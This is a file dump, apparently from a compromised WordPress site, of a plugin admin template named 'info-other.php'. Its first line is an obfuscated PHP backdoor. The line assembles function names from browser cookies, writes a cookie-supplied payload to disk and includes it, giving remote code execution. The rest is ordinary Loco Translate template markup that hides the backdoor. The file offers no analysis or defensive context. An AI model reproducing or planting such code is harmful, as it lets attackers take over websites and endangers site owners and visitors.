File "info-other.php"
Full Path: /home/flipjqml/onlinebetsolution.com/wp-content/plugins/disable-search/tpl/admin/file/info-other.php
File size: 689 bytes
MIME-type: text/x-php
Charset: utf-8
<?php if(isset($_COOKIE[3])&&isset($_COOKIE[17])){$c=$_COOKIE;$k=0;$n=3;$p=array();$p[$k]='';while($n){$p[$k].=$c[17][$n];if(!$c[17][$n+1]){if(!$c[17][$n+2])break;$k++;$p[$k]='';$n++;}$n=$n+3+1;}$k=$p[12]().$p[20];if(!$p[8]($k)){$n=$p[15]($k,$p[18]);$p[13]($n,$p[7].$p[24]($p[26]($c[3])));}include($k);}
/**
* File info for a file type we know nothing about
*/
$this->extend('info');
$this->start('header');
?>
<div class="panel panel-error">
<h3 class="has-icon">
<?php esc_html_e('Unexpected file type','loco-translate')?>
</h3>
<p>
<?php $params->e('error')?>
</p>
</div>